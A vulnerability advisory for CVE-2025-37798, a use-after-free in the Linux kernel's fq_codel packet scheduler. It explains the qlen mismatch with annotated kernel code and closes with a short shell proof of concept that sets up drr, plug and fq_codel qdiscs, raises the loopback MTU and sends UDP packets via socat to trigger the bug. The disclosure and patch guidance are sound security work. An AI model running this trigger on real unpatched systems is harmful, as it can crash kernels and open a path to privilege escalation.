(CVE-2025-37798) Linux Kernel fq_codel_dequeue qlen Mismatch Leading to Use-After-Free and Local Privilege Escalation
CVE: CVE-2025-37798
Affected Versions: Linux kernel 3.5 through 6.15-rc1
CVSS3.1: 7.8 (High) — CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
| Product | Linux Kernel (net_sched) |
|---|---|
| Vendor | Linux Kernel |
| Severity | High — a local unprivileged attacker may exploit this to achieve local privilege escalation |
| Affected Versions | Linux kernel 3.5 through 6.15-rc1 |
| CVE Identifier | CVE-2025-37798 |
| CVE Description | A qlen mismatch in the Linux kernel fq_codel dequeue path allows dropped packets to go unreported to the parent qdisc, leading to a use-after-free and local privilege escalation |
| CWE Classification(s) | CWE-416: Use After Free |
CVSS4.0 Scoring System
Base Score: 8.5
Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
| Metric | Value |
|---|---|
| Attack Vector (AV) | Local |
| Attack Complexity (AC) | Low |
| Attack Requirements (AT) | None |
| Privileges Required (PR) | Low |
| User Interaction (UI) | None |
| Vulnerable System Confidentiality (VC) | High |
| Vulnerable System Integrity (VI) | High |
| Vulnerable System Availability (VA) | High |
| Subsequent System Confidentiality (SC) | None |
| Subsequent System Integrity (SI) | None |
| Subsequent System Availability (SA) | None |
Technical Details
A use-after-free vulnerability in the Linux Kernel net scheduler subsystem can be exploited to achieve local privilege escalation. By manipulating the network interface’s maximum transmission unit, it is possible to drop packets in fq_codel_dequeue without notifying a parent qdisc. This corrupts internal qlen tracking, allowing classes to be removed while still referenced in their parent, causing a use-after-free vulnerability. We recommend upgrading past commit 342debc12183b51773b3345ba267e9263bdfaaef
The vulnerability lies in the fq_codel_dequeue() function.
skb = codel_dequeue(sch, &sch->qstats.backlog, &q->cparams,
&flow->cvars, &q->cstats, qdisc_pkt_len,
codel_get_enqueue_time, drop_func, dequeue_func); // [1]
if (!skb) {
if ((head == &q->new_flows) && !list_empty(&q->old_flows))
list_move_tail(&flow->flowchain, &q->old_flows);
else
list_del_init(&flow->flowchain);
goto begin;
}
qdisc_bstats_update(sch, skb);
flow->deficit -= qdisc_pkt_len(skb);
if (q->cstats.drop_count && sch->q.qlen) { // [2]
qdisc_tree_reduce_backlog(sch, q->cstats.drop_count, // [3]
q->cstats.drop_len);
q->cstats.drop_count = 0;
q->cstats.drop_len = 0;
}
return skb;
At [1], codel_dequeue() will dequeue a single packet. However, if certain conditions ([4]) are met, it will also drop a number of packets ([5]).
drop = codel_should_drop(skb, ctx, vars, params, stats,
skb_len_func, skb_time_func, backlog, now); // [4]
// ...
} else if (drop) {
u32 delta;
if (params->ecn && INET_ECN_set_ce(skb)) {
stats->ecn_mark++;
} else {
stats->drop_len += skb_len_func(skb);
drop_func(skb, ctx);
stats->drop_count++; // [5]
skb = dequeue_func(vars, ctx);
drop = codel_should_drop(skb, ctx, vars, params,
stats, skb_len_func,
skb_time_func, backlog, now);
}
vars->dropping = true;
delta = vars->count - vars->lastcount;
if (delta > 1 &&
codel_time_before(now - vars->drop_next,
16 * params->interval)) {
vars->count = delta;
codel_Newton_step(vars);
} else {
vars->count = 1;
vars->rec_inv_sqrt = ~0U >> REC_INV_SQRT_SHIFT;
}
vars->lastcount = vars->count;
vars->drop_next = codel_control_law(now, params->interval,
vars->rec_inv_sqrt);
}
The number of dropped packets is maintained in drop_count. At [2], there is a check for whether any packets were dropped. It additionally checks that the scheduler is not empty (non-zero qlen). Only if both conditions are met, then the parent qdisc is notified of the dropped packets at [3].
By triggering the conditions in codel_dequeue() to drop packets in a manner that empties the fq_codel qdisc, it is possible to have a mismatch in qlen between the fq_codel qdisc and its parent. It is possible to achieve this by manipulating the MTU of the network interface that the qdisc is attached to. These are the conditions to fulfill in codel_should_drop().
skb_len = skb_len_func(skb);
vars->ldelay = now - skb_time_func(skb);
if (unlikely(skb_len > stats->maxpacket))
stats->maxpacket = skb_len;
if (codel_time_before(vars->ldelay, params->target) ||
*backlog <= params->mtu) { // [6]
/* went below - stay below for at least interval */
vars->first_above_time = 0;
return false;
}
ok_to_drop = false;
if (vars->first_above_time == 0) { // [7]
/* just went above from below. If we stay above
* for at least interval we'll say it's ok to drop
*/
vars->first_above_time = now + params->interval;
} else if (codel_time_after(now, vars->first_above_time)) {
ok_to_drop = true;
}
return ok_to_drop;
For [6], params->mtu is the MTU of the network interface at the time the qdisc is created. By sending a packet larger than this value (for instance, increasing the MTU after creating the qdisc), it is possible to pass the check with a single packet left in the backlog. This allows us to drop packets and empty the qdisc.
The mismatch in qlen can be turned into a UAF in a classful parent (like drr), as found in other reports, e.g. https://web.git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=638ba5089324796c2ee49af10427459c2de35f71 and https://web.git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=647cef20e649c576dff271e018d5d15d998b629d. It is possible to escalate the UAF into a LPE.
Proof of Concept
unshare -rn
ip link set dev lo up
tc qdisc add dev lo handle 1:0 root drr
tc class add dev lo classid 1:1 drr
tc class add dev lo classid 1:2 drr
tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024
ip link set dev lo mtu 1500
tc qdisc add dev lo parent 1:2 handle 3:0 fq_codel target 1 interval 1 flows 1
ip link set dev lo mtu 65536
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))
for i in {1..3}; do
echo -n "$(printf '%2000s')" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))
done
tc qdisc change dev lo handle 2:0 plug release_indefinite
Fix
Upgrade past commit 342debc1.
References
Credit
Gerrard Tai of STAR Labs SG Pte. Ltd.
Timeline
- 2025-03-07 — Reported to Linux Kernel Security Team
- 2025-05-02 — CVE-2025-37798 published